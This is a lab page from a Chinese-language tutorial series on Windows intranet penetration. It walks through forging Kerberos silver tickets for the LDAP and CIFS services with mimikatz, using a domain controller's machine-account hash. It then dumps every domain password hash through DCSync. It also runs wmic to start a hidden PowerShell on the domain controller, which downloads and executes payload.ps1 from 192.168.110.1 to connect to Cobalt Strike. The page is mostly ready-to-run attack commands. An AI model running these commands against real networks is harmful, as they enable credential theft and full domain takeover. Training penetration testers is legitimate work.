内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
30白银票据-实验
## 域内机器上线域控 ``` DC$:b11bfe9b4b21b5878366ec1973ca237f ``` 1、查看当前用户所在组 ``` net user lm /domain ```  2、查看sid值 S-1-5-21-2744095687-1279945619-2928600117  3、伪造LDAP 服务的白银票据 ``` mimikatz kerberos::golden /domain:xbxaq.com /sid:S-1-5-21-2744095687-1279945619-2928600117 /target:dc.xbxaq.com /service:LDAP /rc4:b11bfe9b4b21b5878366ec1973ca237f /user:administrator /ptt ```   4、使用dcsync技术查询hash值 ``` mimikatz lsadump::dcsync /domain:xbxaq.com /all /csv ```  5、伪造黄金票据   6、wmic上线CS ``` shell wmic /node:dc.xbxaq.com process call create "powershell.exe -nop -w hidden -c \"IEX((new-object net.webclient).downloadstring('http://192.168.110.1:8000/payload.ps1'))\"" ```  ## 工作组机器上线域控 1、查询是否加入域  2、修改DNS或者hostst文件使得域内域名指向域控 ``` netsh interface ipv4 add dns 本地连接 192.168.110.5 ```  3、获取白银票据中所需要的条件,伪造HOST服务,配合Windows服务横向 ``` kerberos::golden /domain:域名 /sid:SID值 /target:目标机器 /service:服务名 /rc4:目标机器上的机器账户NTLM-HASH值 /user:伪造的账户名 </ptt> ``` ``` mimikatz kerberos::golden /domain:xbxaq.com /sid:S-1-5-21-2744095687-1279945619-2928600117 /target:dc.xbxaq.com /service:CIFS /rc4:b11bfe9b4b21b5878366ec1973ca237f /user:administrator /ptt ```   4、再伪造一张ladp服务 ``` mimikatz kerberos::golden /domain:xbxaq.com /sid:S-1-5-21-2744095687-1279945619-2928600117 /target:dc.xbxaq.com /service:LDAP /rc4:b11bfe9b4b21b5878366ec1973ca237f /user:administrator /ptt ```  5、使用dcsync技术 ``` mimikatz lsadump::dcsync /domain:xbxaq.com /all /csv ```  6、PTH认证 CS上线  
毛林
2025年9月7日 11:39
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码